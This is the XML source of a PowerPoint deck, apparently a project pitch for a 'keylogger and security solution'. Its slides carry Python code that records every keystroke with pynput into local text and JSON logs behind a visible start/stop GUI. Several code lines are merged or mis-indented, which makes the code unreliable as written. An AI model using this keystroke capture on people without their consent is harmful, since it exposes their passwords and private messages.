                <a:ea typeface="Sora" pitchFamily="34" charset="-122"/>
                <a:cs typeface="Sora" pitchFamily="34" charset="-120"/>
              </a:rPr>
              <a:t>PROJECT OVERVIEW</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="6707" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="6" name="Text 2"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="864037" y="4772025"/>
            <a:ext cx="7415927" cy="1185148"/>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The project overview provides a high-level summary of the keylogger and security solution being developed. It outlines the key objectives, features, and benefits of the project.</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="194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52610" y="2288858"/>
            <a:ext cx="4869180" cy="3651885"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="6" name="Text 1"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="864037" y="1679853"/>
            <a:ext cx="7415927" cy="2129314"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0" anchor="t"/>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:lnSpc>
                <a:spcPts val="8384"/>
              </a:lnSpc>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="6707" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="B380FF"/>
                </a:solidFill>
                <a:latin typeface="Sora" pitchFamily="34" charset="0"/>
                <a:ea typeface="Sora" pitchFamily="34" charset="-122"/>
                <a:cs typeface="Sora" pitchFamily="34" charset="-120"/>
              </a:rPr>
              <a:t>WHO ARE THE END USERS?</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="6707" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="7" name="Text 2"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="864037" y="4179451"/>
            <a:ext cx="7415927" cy="2370296"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0" anchor="t"/>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:lnSpc>
                <a:spcPts val="3110"/>
              </a:lnSpc>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1944" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="E0D6DE"/>
                </a:solidFill>
                <a:latin typeface="Noto Sans TC" pitchFamily="34" charset="0"/>
                <a:ea typeface="Noto Sans TC" pitchFamily="34" charset="-122"/>
                <a:cs typeface="Noto Sans TC" pitchFamily="34" charset="-120"/>
              </a:rPr>
              <a:t>The end users of this keylogger and security solution are individuals and organizations who need to monitor and secure their computer systems and networks. This includes businesses, government agencies, educational institutions, and personal computer users who want to protect their data and devices from unauthorized access, data breaches, and other cyber threats.</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1944"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sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="Text 1"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1127760" y="623530"/>
            <a:ext cx="12374761" cy="1953816"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0" anchor="t"/>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:lnSpc>
                <a:spcPts val="7693"/>
              </a:lnSpc>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="6154" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="B380FF"/>
                </a:solidFill>
                <a:latin typeface="Sora" pitchFamily="34" charset="0"/>
                <a:ea typeface="Sora" pitchFamily="34" charset="-122"/>
                <a:cs typeface="Sora" pitchFamily="34" charset="-120"/>
              </a:rPr>
              <a:t>YOUR SOLUTION AND ITS VALUE PROPOSITION</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="6154" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="5" name="Shape 2"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1127760" y="2917150"/>
            <a:ext cx="12374761" cy="4688919"/>
          </a:xfrm>
          <a:prstGeom prst="roundRect">
            <a:avLst>
              <a:gd name="adj" fmla="val 1449"/>
            </a:avLst>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="1F004D"/>
          </a:solidFill>
          <a:ln/>
        </p:spPr>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="6" name="Shape 3"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1116449" y="2917150"/>
            <a:ext cx="12397383" cy="4688919"/>
          </a:xfrm>
          <a:prstGeom prst="roundRect">
            <a:avLst>
              <a:gd name="adj" fmla="val 725"/>
            </a:avLst>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="1F004D"/>
          </a:solidFill>
          <a:ln/>
        </p:spPr>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="7" name="Text 4"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1342906" y="3087053"/>
            <a:ext cx="11944469" cy="4349115"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0" anchor="t"/>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:lnSpc>
                <a:spcPts val="2854"/>
              </a:lnSpc>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1784" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="E0D6DE"/>
                </a:solidFill>
                <a:highlight>
                  <a:srgbClr val="1F004D"/>
                </a:highlight>
                <a:latin typeface="Consolas" pitchFamily="34" charset="0"/>
                <a:ea typeface="Consolas" pitchFamily="34" charset="-122"/>
                <a:cs typeface="Consolas" pitchFamily="34" charset="-120"/>
              </a:rPr>
              <a:t>import tkinter as tk </a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1784" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:lnSpc>
                <a:spcPts val="2854"/>
              </a:lnSpc>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1784" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="E0D6DE"/>
                </a:solidFill>
                <a:highlight>
                  <a:srgbClr val="1F004D"/>
                </a:highlight>
                <a:latin typeface="Consolas" pitchFamily="34" charset="0"/>
                <a:ea typeface="Consolas" pitchFamily="34" charset="-122"/>
                <a:cs typeface="Consolas" pitchFamily="34" charset="-120"/>
              </a:rPr>
              <a:t>from tkinter import * </a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1784" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:lnSpc>
                <a:spcPts val="2854"/>
              </a:lnSpc>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1784" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="E0D6DE"/>
                </a:solidFill>
                <a:highlight>
                  <a:srgbClr val="1F004D"/>
                </a:highlight>
                <a:latin typeface="Consolas" pitchFamily="34" charset="0"/>
                <a:ea typeface="Consolas" pitchFamily="34" charset="-122"/>
                <a:cs typeface="Consolas" pitchFamily="34" charset="-120"/>
              </a:rPr>
              <a:t>from pynput import keyboard import json</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1784" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:lnSpc>
                <a:spcPts val="2854"/>
              </a:lnSpc>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1784" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="E0D6DE"/>
                </a:solidFill>
                <a:highlight>
                  <a:srgbClr val="1F004D"/>
                </a:highlight>
                <a:latin typeface="Consolas" pitchFamily="34" charset="0"/>
                <a:ea typeface="Consolas" pitchFamily="34" charset="-122"/>
                <a:cs typeface="Consolas" pitchFamily="34" charset="-120"/>
              </a:rPr>
              <a:t>keys_used = [] flag = False keys = ""</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1784" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:lnSpc>
                <a:spcPts val="2854"/>
              </a:lnSpc>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1784" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="E0D6DE"/>
                </a:solidFill>
                <a:highlight>
                  <a:srgbClr val="1F004D"/>
                </a:highlight>
                <a:latin typeface="Consolas" pitchFamily="34" charset="0"/>
                <a:ea typeface="Consolas" pitchFamily="34" charset="-122"/>
                <a:cs typeface="Consolas" pitchFamily="34" charset="-120"/>
              </a:rPr>
              <a:t>def generate_text_log(key): </a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1784" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:lnSpc>
                <a:spcPts val="2854"/>
              </a:lnSpc>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1784" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="E0D6DE"/>
                </a:solidFill>
                <a:highlight>
                  <a:srgbClr val="1F004D"/>
                </a:highlight>
                <a:latin typeface="Consolas" pitchFamily="34" charset="0"/>
                <a:ea typeface="Consolas" pitchFamily="34" charset="-122"/>
                <a:cs typeface="Consolas" pitchFamily="34" charset="-120"/>
              </a:rPr>
              <a:t>    with open('key_log.txt', "w+") as keys: </a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1784" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:lnSpc>
                <a:spcPts val="2854"/>
              </a:lnSpc>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1784" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="E0D6DE"/>
                </a:solidFill>
                <a:highlight>
                  <a:srgbClr val="1F004D"/>
                </a:highlight>
                <a:latin typeface="Consolas" pitchFamily="34" charset="0"/>
                <a:ea typeface="Consolas" pitchFamily="34" charset="-122"/>
                <a:cs typeface="Consolas" pitchFamily="34" charset="-120"/>
              </a:rPr>
              <a:t>        keys.write(key)</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1784" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:lnSpc>
                <a:spcPts val="2854"/>
              </a:lnSpc>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1784" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="E0D6DE"/>
                </a:solidFill>
                <a:highlight>
                  <a:srgbClr val="1F004D"/>
                </a:highlight>
                <a:latin typeface="Consolas" pitchFamily="34" charset="0"/>
                <a:ea typeface="Consolas" pitchFamily="34" charset="-122"/>
                <a:cs typeface="Consolas" pitchFamily="34" charset="-120"/>
              </a:rPr>
              <a:t>def generate_json_file(keys_used): </a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1784" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:lnSpc>
                <a:spcPts val="2854"/>
              </a:lnSpc>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1784" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="E0D6DE"/>
                </a:solidFill>
                <a:highlight>
                  <a:srgbClr val="1F004D"/>
                </a:highlight>
                <a:latin typeface="Consolas" pitchFamily="34" charset="0"/>
                <a:ea typeface="Consolas" pitchFamily="34" charset="-122"/>
                <a:cs typeface="Consolas" pitchFamily="34" charset="-120"/>
              </a:rPr>
              <a:t>    with open('key_log.json', '+wb') as key_log: </a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1784" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:lnSpc>
                <a:spcPts val="2854"/>
              </a:lnSpc>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1784" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="E0D6DE"/>
                </a:solidFill>
                <a:highlight>
                  <a:srgbClr val="1F004D"/>
                </a:highlight>
                <a:latin typeface="Consolas" pitchFamily="34" charset="0"/>
                <a:ea typeface="Consolas" pitchFamily="34" charset="-122"/>
                <a:cs typeface="Consolas" pitchFamily="34" charset="-120"/>
              </a:rPr>
              <a:t>        key_list_bytes = json.dumps(keys_used).encode()       </a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1784" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:lnSpc>
                <a:spcPts val="2854"/>
              </a:lnSpc>
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="en-US" sz="1784" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:lnSpc>
                <a:spcPts val="2854"/>
              </a:lnSpc>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1784" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="E0D6DE"/>
                </a:solidFill>
                <a:highlight>
                  <a:srgbClr val="1F004D"/>
                </a:highlight>
                <a:latin typeface="Consolas" pitchFamily="34" charset="0"/>
                <a:ea typeface="Consolas" pitchFamily="34" charset="-122"/>
                <a:cs typeface="Consolas" pitchFamily="34" charset="-120"/>
              </a:rPr>
              <a:t>        key_log.write(key_list_bytes)</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1784"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sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="Text 1"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="864037" y="902137"/>
            <a:ext cx="12902327" cy="2129314"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0" anchor="t"/>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:lnSpc>
                <a:spcPts val="8384"/>
              </a:lnSpc>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="6707" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="B380FF"/>
                </a:solidFill>
                <a:latin typeface="Sora" pitchFamily="34" charset="0"/>
                <a:ea typeface="Sora" pitchFamily="34" charset="-122"/>
                <a:cs typeface="Sora" pitchFamily="34" charset="-120"/>
              </a:rPr>
              <a:t>YOUR SOLUTION AND ITS VALUE PROPOSITION</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="6707" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="5" name="Shape 2"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="864037" y="3401735"/>
            <a:ext cx="12902327" cy="3925729"/>
          </a:xfrm>
          <a:prstGeom prst="roundRect">
            <a:avLst>
              <a:gd name="adj" fmla="val 1887"/>
            </a:avLst>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="1F004D"/>
          </a:solidFill>
          <a:ln/>
        </p:spPr>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="6" name="Shape 3"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="851773" y="3401735"/>
            <a:ext cx="12926854" cy="3925729"/>
          </a:xfrm>
          <a:prstGeom prst="roundRect">
            <a:avLst>
              <a:gd name="adj" fmla="val 943"/>
            </a:avLst>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="1F004D"/>
          </a:solidFill>
          <a:ln/>
        </p:spPr>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="7" name="Text 4"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1098590" y="3586877"/>
            <a:ext cx="12433221" cy="3555444"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0" anchor="t"/>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:lnSpc>
                <a:spcPts val="3110"/>
              </a:lnSpc>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1944" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="E0D6DE"/>
                </a:solidFill>
                <a:highlight>
                  <a:srgbClr val="1F004D"/>
                </a:highlight>
                <a:latin typeface="Consolas" pitchFamily="34" charset="0"/>
                <a:ea typeface="Consolas" pitchFamily="34" charset="-122"/>
                <a:cs typeface="Consolas" pitchFamily="34" charset="-120"/>
              </a:rPr>
              <a:t>def on_press(key): 
    global flag, keys_used, keys 
    if flag == False: 
        keys_used.append( {'Pressed': f'{key}'} ) 
        flag = True
if flag == True:
    keys_used.append({'Held': f'{key}'})
generate_json_file(keys_used)
</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1944"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838"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="07070C"/>
          </a:solidFill>
          <a:ln/>
        </p:spPr>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="Text 1"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1558171" y="579596"/>
            <a:ext cx="11513939" cy="1818084"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0" anchor="t"/>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:lnSpc>
                <a:spcPts val="7157"/>
              </a:lnSpc>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="5726" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="B380FF"/>
                </a:solidFill>
                <a:latin typeface="Sora" pitchFamily="34" charset="0"/>
                <a:ea typeface="Sora" pitchFamily="34" charset="-122"/>
                <a:cs typeface="Sora" pitchFamily="34" charset="-120"/>
              </a:rPr>
              <a:t>YOUR SOLUTION AND ITS VALUE PROPOSITION</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="5726" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="5" name="Text 2"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1558171" y="2713792"/>
            <a:ext cx="11513939" cy="337185"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="none" rtlCol="0" anchor="t"/>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:lnSpc>
                <a:spcPts val="2656"/>
              </a:lnSpc>
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="en-US" sz="1660" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="6" name="Shape 3"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1558171" y="3288030"/>
            <a:ext cx="11513939" cy="4362212"/>
          </a:xfrm>
          <a:prstGeom prst="roundRect">
            <a:avLst>
              <a:gd name="adj" fmla="val 1450"/>
            </a:avLst>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="1F004D"/>
          </a:solidFill>
          <a:ln/>
        </p:spPr>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="7" name="Shape 4"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1547693" y="3288030"/>
            <a:ext cx="11534894" cy="4362212"/>
          </a:xfrm>
          <a:prstGeom prst="roundRect">
            <a:avLst>
              <a:gd name="adj" fmla="val 725"/>
            </a:avLst>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="1F004D"/>
          </a:solidFill>
          <a:ln/>
        </p:spPr>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="8" name="Text 5"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1758434" y="3446026"/>
            <a:ext cx="11113413" cy="4046220"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0" anchor="t"/>
          <a:lstStyle/>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def on_release(key): </a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1660" dirty="0"/>
          </a:p>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    global flag, keys_used, keys keys_used.append( {'Released': f'{key}'} )</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1660" dirty="0"/>
          </a:p>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if flag == True:</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1660" dirty="0"/>
          </a:p>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    flag = False</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1660" dirty="0"/>
          </a:p>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generate_json_file(keys_used)</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1660" dirty="0"/>
          </a:p>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keys = keys + str(key)</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1660" dirty="0"/>
          </a:p>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generate_text_log(str(keys))</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1660" dirty="0"/>
          </a:p>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def start_keylogger(): </a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1660" dirty="0"/>
          </a:p>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    global listener listener = keyboard.Listener(on_press=on_press,                          </a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1660" dirty="0"/>
          </a:p>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    on_release=on_release) listener.start() label.config(text="[+] Keylogger is        </a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1660" dirty="0"/>
          </a:p>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    running!\n[!] Saving the keys in 'keylogger.txt'")                               </a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1660" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:lnSpc>
                <a:spcPts val="2656"/>
              </a:lnSpc>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1660" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="E0D6DE"/>
                </a:solidFill>
                <a:highlight>
                  <a:srgbClr val="1F004D"/>
                </a:highlight>
                <a:latin typeface="Consolas" pitchFamily="34" charset="0"/>
                <a:ea typeface="Consolas" pitchFamily="34" charset="-122"/>
                <a:cs typeface="Consolas" pitchFamily="34" charset="-120"/>
              </a:rPr>
              <a:t>    start_button.config(state='disabled') stop_button.config(state='normal')</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="166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789</Words>
  <Application>Microsoft Office PowerPoint</Application>
  <PresentationFormat>Custom</PresentationFormat>
  <Paragraphs>90</Paragraphs>
  <Slides>13</Slides>
  <Notes>13</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PptxGenJS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Lenovo</cp:lastModifiedBy>
  <cp:revision>3</cp:revision>
  <dcterms:created xsi:type="dcterms:W3CDTF">2024-06-22T08:02:38Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2024-06-22T12:00:23Z</dcterms:modified>
</cp:coreProperties>
</file>